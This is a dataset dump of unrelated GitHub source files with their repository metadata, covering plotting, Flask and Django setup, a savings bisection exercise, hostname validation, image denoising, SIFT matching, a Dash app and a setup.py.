plt.plot(Ttotal_exp,mi_exp,'or',markersize=6, label='Experimental')
plt.xlabel('Tempo de cultivo (h)',weight='bold')
plt.ylabel('Taxa $\mu(h^{-1}$)', weight='bold')
plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=2, fancybox=True, shadow=True )
plt.grid(True)
f.set_figheight(9)
f.set_figwidth(14)
f.patch.set_facecolor('white')
plt.style.use('default')
plt.show()
|
[
"noreply@github.com"
] |
BrunaAQ.noreply@github.com
|
2d3c42d80962b8ac92822559e4ee520b78fc17e7
|
534f2777f413ddd1179c959d370fd8aaaa70b615
|
/manage.py
|
44936832baf7941595ad04e4ddfbfa639e9cf628
|
[] |
no_license
|
cnf/MarkedImp
|
363ccee61a9f4311cfd2b7ac37ee5053882d434c
|
5518c62174c57ac6392ac80cf56e16b022b5f7e5
|
refs/heads/master
| 2020-12-24T15:22:12.447719
| 2012-05-29T20:26:00
| 2012-05-29T20:26:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 961
|
py
|
#!/usr/bin/env python
from flaskext.script import Manager, prompt_bool
from marked import app
# import fixtures as _fixtures
from marked.database import init_db
import os
manager = Manager(app)
@manager.shell
def make_shell_context():
from marked import models
return dict(app=app, mod=models)
@manager.command
def newdb():
"""Deletes the database, and creates a new empty one."""
if prompt_bool("Are you sure you want to lose all your data"):
try:
os.remove('test.db')
except OSError:
print "Database did not exist"
init_db()
# @manager.command
# def test():
# """docstring for tests"""
# from unittest import TestLoader, TextTestRunner
# cur_dir = os.path.dirname(os.path.abspath(__file__))
# loader = TestLoader()
# test_suite = loader.discover(cur_dir)
# runner = TextTestRunner(verbosity=2)
# runner.run(test_suite)
if __name__ == "__main__":
manager.run()
|
[
"frank.rosquin@gmail.com"
] |
frank.rosquin@gmail.com
|
90fdd31968443ff7eb5b493e7141dd22fae266ee
|
9cbee0c3fbc22172d38d28f18e24c37a4c9e7eee
|
/ps1c.py
|
fa4d2b9200fcda048be1abfafb406bc526e1c9bd
|
[] |
no_license
|
samconstans/wwcode_mit_spring2017
|
7ffa4e475f394dada60853b56e92a0b3c0d6efd8
|
44de041f5cd689f09b3b8ab420361d8cf3286cd5
|
refs/heads/master
| 2021-01-19T12:08:54.531748
| 2017-05-24T10:09:31
| 2017-05-24T10:09:31
| 88,020,522
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,168
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 24 13:26:07 2017
@author: Анастасия
"""
annual_salary = int(input('Enter your starting annual salary:'))
down_payment = 250000.0
error = 100
semi_annual_raise = 0.07
r = 0.04
all_months = 36
left = 0
right = 10000
saving_rate = 0.0
steps = 0
while left + 1 < right:
portion_saved =int((left+right)/2)
current_savings = 0.0
monthly_salary = annual_salary / 12
for month in range(1, all_months+1):
current_savings += (current_savings * r) / 12 + (
portion_saved/10000 * monthly_salary)
if month % 6 == 0:
monthly_salary += monthly_salary * semi_annual_raise
steps += 1
difference = current_savings - down_payment
if 0.0 <= difference < error:
saving_rate =(left + right)/2
break
elif difference < 0:
left = portion_saved
elif difference > error:
right = portion_saved
saving_rate = saving_rate/10000
if 0.0 < saving_rate < 1:
print('Best savings rate:', saving_rate)
print('Steps in bisection search:', steps)
else:
print('It is not possible to pay he down payment in three years.')
|
[
"nastia-vovk@ukr.net"
] |
nastia-vovk@ukr.net
|
ecddf43835fc02570ec7293ef59cf49e0c1c47f9
|
916de4fe646dc8e6dea4afb07e928633fed4687d
|
/nettool/hostname.py
|
0353882dce3623d0dfe3690bad8c5d235ecdcf5f
|
[
"MIT"
] |
permissive
|
dirkakrid/nettool
|
b96f83fbc98f6d537083814ebe06df0f629e93d5
|
378a58da2bc405d6dd0c5bcead4b35427c0778a1
|
refs/heads/master
| 2021-01-21T15:42:54.144014
| 2016-05-13T07:06:22
| 2016-05-13T07:06:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,127
|
py
|
# -*- coding: utf-8 -*-
# import ipaddress
from nettool.address.ipv4address import IPv4Address
from nettool.nettest import NetTest as nu
class Hostname(object):
def __init__(self, name=None, ip=None):
if name is None and ip is None:
raise ValueError('Must specify a name or ip')
if isinstance(ip, basestring) and not ip.strip():
ip = None
if ip is None and nu.validate.ip(name):
self.ip = name
name = None
else:
self.ip = ip
self._initialize_name(name)
def _initialize_name(self, value):
self.domain = ''
if nu.validate.ip(value):
message = 'Invalid hostname \'{}\'. Hostname cannot be an IP address'.format(value)
raise ValueError(message)
if isinstance(value, basestring):
if '.' in value.strip('.'):
parts = value.split('.')
name = parts.pop(0)
nu.validate.host(name)
self.name = name
self.domain = '.'.join(parts)
else:
self.name = value
elif value is None:
self.name = None
else:
message = "Invalid type used in Name initilization: '{}'.".format(type(value).__name__)
raise TypeError(message)
# def _initialize_ip(self, value):
# self.ip = value
@staticmethod
def _build_fqdn(hostname, domain):
fqdn = ''
if hostname is None:
return None
if len(domain) > 0:
fqdn = '.'.join([hostname, domain])
else:
fqdn = hostname
return fqdn
@staticmethod
def _clean_base(value):
return value.lower()
@staticmethod
def _clean_fqdn(value):
return Hostname._clean_base(value).strip('.')
@staticmethod
def _clean_domain(value):
return Hostname._clean_base(value).strip('.')
@staticmethod
def _clean_name(value):
return Hostname._clean_base(value)
@property
def fqdn(self):
return self._build_fqdn(self.name, self.domain)
@property
def name(self):
if not hasattr(self, '_name'):
self._name = None
return self._name
@name.setter
def name(self, value):
if value is None:
value = None
else:
value = Hostname._clean_name(value)
if not nu.validate.host(value):
if nu.validate.hostname(value):
domain = '.'.join(value.split('.')[1:])
value = value.split('.')[0]
nu.validate.host(value, raise_exception=True)
self.domain = domain
else:
nu.validate.host(value, raise_exception=True)
self._name = value
@property
def domain(self):
return self._domain
@domain.setter
def domain(self, value):
if value is not None and self.name is not None:
value = Hostname._clean_domain(value)
nu.validate.hostname(self._build_fqdn(self.name, value), raise_exception=True)
self._domain = value
@property
def ip(self):
address = self._ip
if isinstance(address, IPv4Address):
address = address.exploded
return address
@ip.setter
def ip(self, value):
if value is None:
value = None
else:
nu.validate.ip(value, raise_exception=True)
if not isinstance(value, IPv4Address):
value = IPv4Address(value)
self._ip = value
def __str__(self):
hostname = Hostname._build_fqdn(self.name, self.domain)
ip = self.ip or ''
hostname = hostname or ip
if hostname == ip:
ip = ''
hostname = '{} {}'.format(hostname, ip).strip()
return hostname
def __repr__(self):
hostname = Hostname._build_fqdn(self.name, self.domain)
if hostname is None:
hostname = 'Unknown'
ip = ''
if self.ip:
ip = ' {}'.format(self.ip)
return '<Host {}{}>'.format(hostname, ip)
def _string_equality(self, value):
try:
ip = IPv4Address(value)
return ip == self.ip
except ValueError:
pass
if '.' in value.rstrip('.'):
value = Hostname._clean_fqdn(value)
return value == self.fqdn
else:
value = Hostname._clean_name(value)
return value == self.name
return False
def __eq__(self, value):
if isinstance(value, basestring):
return self._string_equality(value)
elif isinstance(value, Hostname):
if self.domain and value.domain:
if self.fqdn == value.fqdn:
return True
else:
if self.name == value.name:
return True
if self.ip and self.ip == value.ip:
return True
return False
def __ne__(self, value):
return not self.__eq__(value)
|
[
"glencharmon@gmail.com"
] |
glencharmon@gmail.com
|
0528f183fd22997fff41c8d1a3a520f182da6500
|
83bbd8a625d25eca5176e3f74edf293ab0eaec52
|
/produksi/migrations/0037_transisi_user.py
|
f36285aebc377e8d26175385bc44afd9858eb744
|
[] |
no_license
|
dimasrizqi/simfutami
|
1256ba1d064183c84e0ea60b7e41b9f9fb03086a
|
ea2c6309aab739e600bac9e25a8ce3083351f955
|
refs/heads/master
| 2020-04-23T03:21:39.940856
| 2019-04-12T00:30:20
| 2019-04-12T00:30:20
| 170,876,004
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 615
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-04-07 14:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('produksi', '0036_remove_transisi_update_time'),
]
operations = [
migrations.AddField(
model_name='transisi',
name='user',
field=models.ForeignKey(default='1', on_delete=django.db.models.deletion.CASCADE, to='produksi.user'),
preserve_default=False,
),
]
|
[
"dimasrizqi@Jhonny.local"
] |
dimasrizqi@Jhonny.local
|
619d39f280fe2348eecace2659e44c6bf767d8f9
|
b1dd2d0f777404633790589776bcabaf9e0c94c0
|
/company/migrations/0012_internshipapplieddb.py
|
d3d299776c26756dda795574919a18d14c1e9e8d
|
[] |
no_license
|
BItishree/InternshipRecommendation
|
93ba38777271c12d752453bbf9bcb0de7ca46e18
|
c6cad5ad1f5a84b236e65f85bd257b5b55a6f9c5
|
refs/heads/master
| 2023-05-06T08:09:00.044493
| 2021-06-03T13:18:11
| 2021-06-03T13:18:11
| 373,477,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
# Generated by Django 3.1.7 on 2021-04-14 11:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('company', '0011_internship_apply_by'),
]
operations = [
migrations.CreateModel(
name='InternshipAppliedDB',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('internship_id', models.IntegerField()),
('student_id', models.IntegerField()),
('status', models.CharField(default='pending', max_length=30)),
],
),
]
|
[
"56443929+BItishree@users.noreply.github.com"
] |
56443929+BItishree@users.noreply.github.com
|
0c0a8d0dc3afe1db01d8470f909b4f3489a52720
|
1a19b0129770c3f60b8a6af39c708dd9075a61ae
|
/DiceDropOne.py
|
01f722dacce4dba3bbd53a936a5082c5a1fbd8d9
|
[] |
no_license
|
Iampineapple/Little-Mathematical-Problems
|
643875c933abbc31a70dee0bbd71817eac13f4bf
|
944ce13dbd73d0c249f1dba8dda11d6e9e5c22d4
|
refs/heads/master
| 2020-12-24T13:44:20.387265
| 2015-08-16T20:01:41
| 2015-08-16T20:01:41
| 40,141,225
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,482
|
py
|
#!/usr/bin/env python
#made by Cory on 18 Aug 2014
#This program will take ndp (as in, n dice with p sides on each die)
#and calculates the average of ndp, drop the lowest
#We do this by summing up all the possible die combinations,
#and then dividing by the number of die combinations
#This function checks if we've incremented a die's value beyond the possible values
#If so, it sets the die back to one, increments the next die, and checks if that
#die's value has gone beyond the possible values
def checkforoverflow(array, index, p):
if array[index] > p:
array[index] = 1
array[index+1] +=1
checkforoverflow(array, index+1, p)
return
import math
#Ask the user for some input, set indexarray as our array of dice,
#and set the total to zero. Indexarray contains one more entry than the number of dice-
#when the final item is incremented to two, we've gone through all the permutations
print "Let's calculate the average of ndp, drop the lowest !"
n = int(raw_input('What is n ? (How many dice do we have ?)'))
p = int(raw_input('What is p ? (How many sides does each die have ?'))
indexarray = [1]*(n+1)
averagetotal = 0
#Check all the permutations, adding their value to averagetotal, and checking for overflow
while indexarray[n] < 2:
averagetotal += sum(indexarray[0:n]) - min(indexarray[0:n])
indexarray[0] += 1
checkforoverflow(indexarray, 0, p)
average = averagetotal / float(p**n)
print "The average was ", average
|
[
"kori.haight@gmail.com"
] |
kori.haight@gmail.com
|
371d6010629dada431dc7b327500474c445e4d21
|
61fd46efd8efc8af52604ef977a4fe0802c9d566
|
/journal/migrations/0021_auto_20180415_1122.py
|
db3019ba31bbff7c774df437f078b854cd2a7c23
|
[] |
no_license
|
zrmartin/WebApp
|
daf035f2dc4baf9b0baab18c1bb47c656de1491f
|
fe76ad2d9fea25939b3826711015efd5c961c7fa
|
refs/heads/master
| 2021-05-09T21:07:57.372652
| 2018-07-12T17:43:50
| 2018-07-12T17:43:50
| 118,720,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 492
|
py
|
# Generated by Django 2.0.1 on 2018-04-15 19:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('journal', '0020_auto_20180414_1940'),
]
operations = [
migrations.AlterField(
model_name='concert',
name='venue',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='venue', to='journal.Venue'),
),
]
|
[
"zrmartin@calpoly.edu"
] |
zrmartin@calpoly.edu
|
00dc56be07011f9c0232bff19be22aef55335885
|
70cb2608ed49589f08f2bef04cf4d3b7f5aef2c1
|
/Python/model_Dummy_regroup.py
|
6bae7b657de85a7d48b4b8d20f65a8fd1ba529c5
|
[] |
no_license
|
Rav830/DiscussionTrackerCollaboration-LREC2020
|
b61180fc8a915bf9c7500b4a2267fb125c0efc7f
|
af20cf0079e4416ecd9aaf7ae2e085a6a5ee0616
|
refs/heads/master
| 2022-06-02T10:08:38.910707
| 2020-05-05T21:53:50
| 2020-05-05T21:53:50
| 223,023,383
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,094
|
py
|
import config
tee = config.Tee('../Results/%s/Dummy%s%s_regroup_model.txt' % (config.args.dataset, config.args.tf_idf, config.args.remove_non), 'w')
from header_model_data import *
from sklearn.dummy import DummyClassifier
print("Regrouping the labels")
for i in range(len(yDF)):
if(yDF[i] != pr.y_conversion('new-idea')):
yDF[i] = pr.y_conversion('Non')
print("The Class Distribution is:")
classDist = Counter(yDF)
for k in classDist.keys():
print("\t"+str(pr.conversion_y(k))+":"+str(classDist[k]))
print("Defining and doing a dummy classifier again set to predict based on the class distribution")
dumDum = DummyClassifier(strategy='stratified', random_state=None, constant = None)
scores = cross_validate(dumDum, xDF, yDF, cv=logo, scoring = scorer)
#print(scores)
#print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
compute_stats(originalclass, predictedclass, True)
print("Confusion Matrix")
print_cm(confusion_matrix(originalclass, predictedclass, labels = list(range(2))), [pr.conversion_y(x) for x in range(2)])
tee.close()
|
[
"ravneetsingh830@gmail.com"
] |
ravneetsingh830@gmail.com
|
27618d86d240c352487bc98038672bf9b88f2853
|
f9dd12b580207cbd7387a6fd2506175f284c96f2
|
/160-Intersection of Tow Linked Lists.py
|
7d79ed26581d5803be8238b9a941d8a563e9cc70
|
[] |
no_license
|
Damon0626/Leetcode-
|
c2e8ced0f2e6da3d3116aa33415bca691bb57217
|
0fb8fa7d9ef65bee816a8aa35326b975d6fb7844
|
refs/heads/master
| 2020-04-03T03:05:00.090478
| 2019-04-15T15:10:05
| 2019-04-15T15:10:05
| 154,976,056
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,435
|
py
|
# -*-coding:utf-8-*-
# @Author: Damon0626
# @Time : 19-4-9 下午10:09
# @Email : wwymsn@163.com
# @Software: PyCharm
'''
Write a program to find the node at which the intersection of two singly linked lists begins.
For example, the following two linked lists:
begin to intersect at node c1.
Example 1:
Input: intersectVal = 8, listA = [4,1,8,4,5], listB = [5,0,1,8,4,5], skipA = 2, skipB = 3
Output: Reference of the node with value = 8
Input Explanation: The intersected node's value is 8 (note that this must not be 0 if the two lists intersect). From the head of A, it reads as [4,1,8,4,5]. From the head of B, it reads as [5,0,1,8,4,5]. There are 2 nodes before the intersected node in A; There are 3 nodes before the intersected node in B.
Example 2:
Input: intersectVal = 2, listA = [0,9,1,2,4], listB = [3,2,4], skipA = 3, skipB = 1
Output: Reference of the node with value = 2
Input Explanation: The intersected node's value is 2 (note that this must not be 0 if the two lists intersect). From the head of A, it reads as [0,9,1,2,4]. From the head of B, it reads as [3,2,4]. There are 3 nodes before the intersected node in A; There are 1 node before the intersected node in B.
Example 3:
Input: intersectVal = 0, listA = [2,6,4], listB = [1,5], skipA = 3, skipB = 2
Output: null
Input Explanation: From the head of A, it reads as [2,6,4]. From the head of B, it reads as [1,5]. Since the two lists do not intersect, intersectVal must be 0, while skipA and skipB can be arbitrary values.
Explanation: The two lists do not intersect, so return null.
Notes:
If the two linked lists have no intersection at all, return null.
The linked lists must retain their original structure after the function returns.
You may assume there are no cycles anywhere in the entire linked structure.
Your code should preferably run in O(n) time and use only O(1) memory.
'''
''' 采用交换头节点的循环方法,可以理解为A + B = B + A,当节点一致的时候,即为重逢点'''
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def getIntersectionNode(self, headA, headB):
"""
:type head1, head1: ListNode
:rtype: ListNode
"""
if not headA or not headB:
return None
pa = headA
pb = headB
while pa != pb:
pa = headB if not pa else pa.next
pb = headA if not pb else pb.next
return pa
|
[
"2404448093@qq.com"
] |
2404448093@qq.com
|
b0924b59c0c9b65d85d8a024b94bb2563bfa590f
|
693d42b5891560ce301dc02335d2ebca9cca60bd
|
/String Reduction.py
|
991288b044b2200ea435a80a4de8ca76fd09d2f9
|
[] |
no_license
|
jananisairam/Hackerrank-Solved-Programs
|
37e6caeedf626399e1a4874aa45f4e7db7ea3ba7
|
8155d0aa9b3150dce5f70f70c2e85e45c69a1305
|
refs/heads/master
| 2021-01-18T17:52:32.932116
| 2017-04-02T12:56:11
| 2017-04-02T12:56:11
| 86,821,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 634
|
py
|
from collections import deque
def stringReduction(a):
queue = deque([a])
min_length = len(a)
while queue:
a = queue.popleft()
if len(a) < min_length:
min_length = len(a)
for i in range(len(a)-1):
substring = a[i:(i+2)]
if substring == "ab" or substring == "ba":
queue.append(a[:i] + "c" + a[(i+2):])
elif substring == "bc" or substring == "cb":
queue.append(a[:i] + "a" + a[(i+2):])
elif substring == "ac" or substring == "ca":
queue.append(a[:i] + "b" + a[(i+2):])
return min_length
|
[
"noreply@github.com"
] |
jananisairam.noreply@github.com
|
9dcb2ba52e5b69c9e273e4abb9b53b12f2a9053f
|
972762e02b2a2c93b6421644c2336d472ca38dcc
|
/alternative.py
|
514488fc5e6adfc02cf44cddbe834894a90f9bd2
|
[] |
no_license
|
nicolas1805961/Markov-chain-image-denoising
|
b622f797dce92d9c4b2fbc543585073d7cfba0cd
|
eb276fa478dd3586d0b70a24812cd2550a45ffbf
|
refs/heads/master
| 2023-02-16T21:03:32.620432
| 2021-01-15T20:35:40
| 2021-01-15T20:35:40
| 310,937,012
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,718
|
py
|
# To add a new cell, type '# %%'
# To add a new markdown cell, type '# %% [markdown]'
# %%
from skimage.io import imread
import numpy as np
import matplotlib.pyplot as plt
image = imread('peppers.jpg')
fig, ax = plt.subplots(1, 1, figsize=(10, 10))
ax.imshow(image)
# %%
from skimage.color import rgb2gray
image = rgb2gray(image)
fig, ax = plt.subplots(1, 1, figsize=(10, 10))
ax.imshow(image, cmap='gray')
# %%
from numpy.linalg import norm
def get_ratio(candidate, x, y, i, j):
regularizer = norm(x[i, j] - x[i - 1, j]) + norm(x[i, j] - x[i + 1, j]) + norm(x[i, j] - x[i, j - 1]) + norm(x[i, j] - x[i, j + 1])
data_consistency = norm(x[i, j] - y[i, j])
u_denominator = 1 * data_consistency + 0 * regularizer
regularizer = norm(candidate - x[i - 1, j]) + norm(candidate - x[i + 1, j]) + norm(candidate - x[i, j - 1]) + norm(candidate - x[i, j + 1])
data_consistency = norm(candidate - y[i, j])
u_numerator = 1 * data_consistency + 0 * regularizer
#return np.exp(-u_numerator) / np.exp(-u_denominator)
return u_denominator - u_numerator
# %%
def update_temp(r):
return np.power(0.99, np.exp(8 * r))
# %%
from numpy.random import rand, randint
h = image.shape[0]
w = image.shape[1]
x = rand(h, w)
y = image
T = 4
count = 0
iterations = 10000000
for iter in range(iterations):
row = randint(1, h - 1)
col = randint(1, w - 1)
candidate = rand()
value = get_ratio(candidate, x, y, row, col)
#p = min(1, value)
p = np.exp(min(0, value) / T)
if rand() < p:
count += 1
x[row, col] = candidate
T *= update_temp(iter / iterations)
print(count)
fig, ax = plt.subplots(1, 1, figsize=(10, 10))
ax.imshow(x, cmap='gray')
# %%
|
[
"nicolasportal92@gmail.com"
] |
nicolasportal92@gmail.com
|
d8c1a0c3c78c52141206c624cab6d5f68155c424
|
0be960f5e7d443698f5fa26a23dd2259c5c8ad05
|
/1清洗数据.py
|
5b180529836b4c7272c2a2123dc7e41258779f01
|
[] |
no_license
|
102757017/lstm-multi
|
e88f129f43f5bc1317e6c7b38fdd239c95cef57f
|
eeb4074a9416af6f567854e082ba1dd6f0e98a18
|
refs/heads/master
| 2022-07-09T23:12:02.310606
| 2020-09-06T15:17:07
| 2020-09-06T15:17:07
| 126,478,981
| 12
| 3
| null | 2022-06-22T03:48:45
| 2018-03-23T11:58:21
|
Python
|
UTF-8
|
Python
| false
| false
| 1,010
|
py
|
from pandas import read_csv
from datetime import datetime
import os
import sys
os.chdir(sys.path[0])
# load data
def parse(x):
return datetime.strptime(x, '%Y %m %d %H')
# 从csv文件载入数据
#parse_dates:这是指定含有时间数据信息的列
#index_col=0表示将第0列作为索引列
#date_parser:指定将输入的字符串转换为可变的时间数据。Pandas默认的数据读取格式是‘YYYY-MM-DD
dataset = read_csv('PRSA_data_2010.1.1-2014.12.31.csv', parse_dates = [['year', 'month', 'day', 'hour']], index_col=0, date_parser=parse)
#丢弃第一列
dataset.drop('No', axis=1, inplace=True)
# 手动指定行标题
dataset.columns = ['pollution', 'dew', 'temp', 'press', 'wnd_dir', 'wnd_spd', 'snow', 'rain']
#指定索引名
dataset.index.name = 'date'
# 将所有“NA”替换为0
dataset['pollution'].fillna(0, inplace=True)
# 丢弃前24小时的数据
dataset = dataset[24:]
# summarize first 5 rows
print(dataset.head(5))
# save to file
dataset.to_csv('pollution.csv')
|
[
"sdf63fg@yeah.net"
] |
sdf63fg@yeah.net
|
0f52bf017c0980dee607b98226646995ae4e8b27
|
725e48574f6dbf9ddb4220e81b75926e8a382a3e
|
/surf_sift.py
|
bb849e6e48cd530e50435907875f3d22639fbf6e
|
[] |
no_license
|
erdustiggen/ImageMatching
|
562e9af7a93253d0487c087d0df408adaabac4f9
|
ac83e6d7cc458686700b1650e1f22fa883081bda
|
refs/heads/master
| 2020-04-11T18:46:43.485386
| 2018-12-16T14:56:28
| 2018-12-16T14:56:28
| 162,011,287
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,518
|
py
|
#!/usr/bin/python3
import numpy as np
import cv2
from matplotlib import pyplot as plt
# img_path = "NoiselessSatelliteImage.png"
# img_path2 = "NoiselessSatelliteImage2.png"
img_path = "sat_img.png"
img_path2 = "noiseless_img.png"
# sift = cv2.xfeatures2d.SURF_create(800)
sift = cv2.xfeatures2d.SIFT_create(800)
flann_index = 1
flann_parameters = dict(algorithm = flann_index, trees = 5)
img_matcher = cv2.FlannBasedMatcher(flann_parameters, {})
image1 = cv2.imread(img_path)
gray_image1 = cv2.cvtColor(image1, cv2.COLOR_BGR2GRAY)
kpts1, descs1 = sift.detectAndCompute(gray_image1,None)
image2 = cv2.imread(img_path2)
gray_image2 = cv2.cvtColor(image2, cv2.COLOR_BGR2GRAY)
kpts2, descs2 = sift.detectAndCompute(gray_image2,None)
img_matches = img_matcher.knnMatch(descs1, descs2, 2)
img_matchesMask = [[0,0] for i in range(len(img_matches))]
for i, (m1,m2) in enumerate(img_matches):
if m1.distance < 0.45 * m2.distance:
img_matchesMask[i] = [1,0]
pt1 = kpts1[m1.queryIdx].pt
pt2 = kpts2[m1.trainIdx].pt
print(i, pt1,pt2 )
if i % 5 ==0:
cv2.circle(image1, (int(pt1[0]),int(pt1[1])), 5, (255,0,255), -1)
cv2.circle(image2, (int(pt2[0]),int(pt2[1])), 5, (255,0,255), -1)
draw_params = dict(matchColor = (0, 255,0),
singlePointColor = (0,0,255),
matchesMask = img_matchesMask,
flags = 0)
res = cv2.drawMatchesKnn(image1,kpts1,image2,kpts2,img_matches,None,**draw_params)
res = cv2.resize(res, (1080, 720))
cv2.imshow("Result", res);cv2.waitKey();cv2.destroyAllWindows()
|
[
"erdustiggen@gmail.com"
] |
erdustiggen@gmail.com
|
bb5c459af5b5ab58cff9c8bab944ef7d0b44df25
|
8ef3f36d842216aa183e90fba1b8aaf7e7cc3eb6
|
/elpheba/migrations/0004_transfer.py
|
c87e64c87f2607a8f43cea500f8dec23a8322630
|
[] |
no_license
|
kmugglet/django
|
11f3ae7873bc1e4a0de6d3334588e878ba470c64
|
4d0af8b43901867d94c79a3cf8287f851f3b5bc5
|
refs/heads/master
| 2020-03-28T18:36:20.349994
| 2018-09-15T11:21:35
| 2018-09-15T11:21:35
| 148,894,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 734
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-08 11:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('elpheba', '0003_account_banked'),
]
operations = [
migrations.CreateModel(
name='Transfer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('acctNumber', models.PositiveIntegerField()),
('withdrawls', models.DecimalField(decimal_places=2, max_digits=12)),
('timeStamp', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"kmugglet@gmail.com"
] |
kmugglet@gmail.com
|
2ee0a9eaff8bf9d9de4f083fbc505de0679dc1f2
|
2c644a4a0e1eaf8373e4a84a5044a33384668b59
|
/new/new/urls.py
|
87259ccce5cc5b8c4c5b44bf29dcc45231948063
|
[
"BSD-3-Clause"
] |
permissive
|
pralakxavier24/Django
|
99ec9ba12fb0f726028098901ca9d2cb74e2a5b8
|
988708fa6f6efd401b93b9c2f051b93fe64191ff
|
refs/heads/main
| 2023-04-16T18:46:02.119606
| 2021-05-03T09:04:39
| 2021-05-03T09:04:39
| 363,873,316
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,006
|
py
|
"""new URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('',include('travello.urls')),
path('admin/', admin.site.urls),
path('accounts/',include('accounts.urls')),
]
urlpatterns = urlpatterns + static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
|
[
"pralakxavier@gmail.com"
] |
pralakxavier@gmail.com
|
7acabc3d4816f58683c1adc1855b5d22b9f65da9
|
22e41be57f6c8b6475451e3581ca3ebfe4eee229
|
/app02.py
|
aa8b5bdef856e827be09a19180ddde124c2f14d2
|
[] |
no_license
|
LaisviToliai/PyConLt2019DashExamples
|
9ddb88e130d1a56d2dd3365bd7a58e518b23b4f2
|
1c3d0d4d6bf1c4b37fbdf14957c7284961a3b5b6
|
refs/heads/master
| 2020-05-27T23:59:32.770816
| 2019-05-26T07:44:05
| 2019-05-26T07:44:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,910
|
py
|
"""Example of poor global state management."""
from pathlib import Path
from typing import Iterable, Mapping
import dash
import dash_core_components as dcc
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_table
import pandas as pd
# create the app
app = dash.Dash(__name__)
# load out initial dataset
titanic_path = Path("./datasets/titanic.csv")
assert (
titanic_path.exists()
), "Cannot find titanic dataset."
df = pd.read_csv(titanic_path)
app.layout = html.Div(
children=[
html.H1("Titanic Dataset"),
html.H5("Search for a name"),
dcc.Dropdown(
id="my-dropdown",
options=[{"label": "All", "value": "both"}]
+ [
{"label": sex, "value": sex}
for sex in df.Sex.unique()
],
value="both",
),
html.Div(id="my-div"),
dash_table.DataTable(
id="my-table",
columns=[
{"name": i, "id": i} for i in df.columns
],
data=[],
),
]
)
@app.callback(
Output(
component_id="my-table", component_property="data"
),
[
Input(
component_id="my-dropdown",
component_property="value",
)
],
)
def provide_passengers(sex: str) -> Iterable[Mapping]:
global df
if sex == "both":
return df.to_dict("rows")
df = df[df.Sex == sex]
return df.to_dict("rows")
@app.callback(
Output(
component_id="my-div",
component_property="children",
),
[
Input(
component_id="my-dropdown",
component_property="value",
)
],
)
def update_output_div(sex: str) -> str:
if sex == "both":
return "Showing all sexes."
return f"Showing all {sex}s."
if __name__ == "__main__":
app.run_server(debug=True)
|
[
"dom.weldon@decisionlab.co.uk"
] |
dom.weldon@decisionlab.co.uk
|
10d54c73b4fe7139233fbda6f0e168b8595b5719
|
e8e98d5125425fb6ff21d9a3609b05278b19c10c
|
/setup.py
|
f958bcff40a72d039429854e76c0a29e0a49a1a7
|
[
"MIT"
] |
permissive
|
ipdae/nirum-python-wsgi
|
76974b909be4de235e8ea78d098a8cdaf1467df8
|
e9a6867f73c2bcde658c8a73a34afb4267c6e13a
|
refs/heads/master
| 2021-08-24T07:21:41.949849
| 2017-12-08T08:12:16
| 2017-12-08T08:12:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,244
|
py
|
import ast
import os
import re
import sys
from setuptools import setup, __version__ as setuptools_version
def readme(name='README.rst'):
try:
with open(name) as f:
rst = f.read()
return re.sub(
r'(^|\n).. include::\s*([^\n]+)($|\n)',
lambda m: m.group(1) + (readme(m.group(2)) or '') + m.group(3),
rst
)
except (IOError, OSError):
return
def get_version():
module_path = os.path.join(os.path.dirname(__file__), 'nirum_wsgi.py')
module_file = open(module_path)
try:
module_code = module_file.read()
finally:
module_file.close()
tree = ast.parse(module_code, module_path)
for node in ast.iter_child_nodes(tree):
if not isinstance(node, ast.Assign) or len(node.targets) != 1:
continue
target, = node.targets
if isinstance(target, ast.Name) and target.id == '__version__':
value = node.value
if isinstance(value, ast.Str):
return value.s
